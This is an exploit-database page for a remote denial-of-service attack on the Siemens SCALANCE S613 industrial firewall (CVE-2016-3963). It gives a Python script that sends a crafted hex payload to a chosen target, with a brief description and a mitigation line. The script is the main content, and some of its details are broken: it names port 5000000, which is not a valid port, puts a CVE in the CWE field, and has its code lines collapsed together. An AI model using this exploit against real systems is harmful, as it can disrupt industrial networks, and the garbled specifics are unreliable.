header-logo
Suggest Exploit
vendor:
SCALANCE S613
by:
t4rkd3vilz
5.3
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: SCALANCE S613
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: CVE-2016-3963
CPE: h:siemens:scalance_s613
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Siemens SCALANCE S613 – Remote Denial of Service

This exploit sends a malicious packet to the target system, which causes a denial of service. The malicious packet is sent to port 5000000.

Mitigation:

The user should ensure that the system is updated with the latest security patches and should also ensure that the system is not exposed to the public internet.
Source

Exploit-DB raw data:

 # Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service 
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
# Tested on: Kali Linux
# CVE: CVE-2016-3963

#!/usr/bin/python

import socket import sys if len(sys.argv) < 2: print('Usage: ' +
sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
(sys.argv[1], 5000000))